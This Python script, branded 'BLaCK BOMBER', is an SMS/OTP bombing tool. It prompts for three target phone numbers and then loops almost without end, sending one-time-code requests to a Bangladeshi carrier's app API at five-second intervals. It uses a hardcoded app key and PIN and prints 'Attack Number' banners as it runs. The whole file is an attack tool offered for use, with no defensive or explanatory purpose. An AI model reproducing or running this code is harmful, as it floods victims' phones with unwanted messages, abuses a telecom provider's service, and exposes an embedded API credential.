import requests
from requests.structures import CaseInsensitiveDict
import requests, os, time, sys, smtplib

# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White
import os
os.system('clear')
import os

import os
import sys
 
 
blue = '\x1b[94m'
lightblue = '\x1b[94m'
red = '\x1b[91m'
white = '\x1b[97m'
green = '\x1b[93m'
green = '\x1b[1;32m'
cyan = '\x1b[96m'
end = '\x1b[0m'
yellow = '\n\n\x1b[1;93m'
os.system('clear')
logu="""

.______    __          ___       ______  __  ___ 
|   _  \  |  |        /   \     /      ||  |/  / 
|  |_)  | |  |       /  ^  \   |  ,----'|  '  /  
|   _  <  |  |      /  /_\  \  |  |     |    <   
|  |_)  | |  `----./  _____  \ |  `----.|  .  \  
|______/  |_______/__/     \__\ \______||__|\__\ 
                                                 
_______   ___________    ____  __   __       _______    
|       \ |   ____\   \  /   / |  | |  |     |   ____|   
|  .--.  ||  |__   \   \/   /  |  | |  |     |  |__      
|  |  |  ||   __|   \      /   |  | |  |     |   __|     
|  '--'  ||  |____   \    /    |  | |  `----.|  |____    
|_______/ |_______|   \__/     |__| |_______||_______|   
                                                         
"""

logo_2="""
\x1b[93m         --------------------------------------\n\x1b[96m		     **BLaCK BOMBER**  \n\x1b[1;32m	          Author  :     DeViL \n\x1b[91m             	  Facebook: 	BLaCk DeViiLe \n\x1b[1;32m	          Github  :     BLaCk DeViiL \n\x1b[1;93m         --------------------------------------
"""


def logoprint(jony):
    for word in jony + '\n':
        sys.stdout.write(word)
        sys.stdout.flush()
        time.sleep(0.03)
        
os.system('clear')
print(logu)
logoprint(logo_2)

number=input(str("  BLaCK DeViiLe Enter Your Target Number: "))
url = "https://circle.robi.com.bd/mylife/appapi/appcall.php"
number2=input(str("   Enter Your Target Number: "))
url2 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"
number3=input(str("   Enter Your Target Number: "))
url3 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"



headers = CaseInsensitiveDict()
headers["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers["User-Agent"] = "gzip"
headers["Content-Type"] = "application/x-www-form-urlencoded"

headers2 = CaseInsensitiveDict()
headers2["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers2["User-Agent"] = "gzip"
headers2["Content-Type"] = "application/x-www-form-urlencoded"

headers3 = CaseInsensitiveDict()
headers3["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers3["User-Agent"] = "gzip"
headers3["Content-Type"] = "application/x-www-form-urlencoded"



data = "op=getOTC&pin=21799&app_version=78&msisdn=88"+number

data2 = "op=getOTC&pin=21799&app_version=78&msisdn=88"+number2

data3 = "op=getOTC&pin=21799&app_version=78&msisdn=88"+number3



for i in range(999999999999999999999999999999999999999999):
    try:
        x = requests.post(url, headers=headers, data=data)
        h = requests.post(url2, headers=headers2, data=data2)
        y = requests.post(url3, headers=headers3, data=data3)
        
        time.sleep(5)

        print(bired+x.text+biblue+" \ntAttack Number "+number+biyellow+number+biblue+' Stay With Mr. BLaCK DeViiLe'+bired+h.text+biblue+" \ntAttack Number "+number+biyellow+number2+biblue+' Stay With Mr. BLaCK DeViiLe'+bired+y.text+biblue+" \ntAttack Number "+number+biyellow+number3+biblue+' Stay With Mr. BLaCK DeViiLe')
        
    except:
        print ("Please Make Sure Your Internet Connection")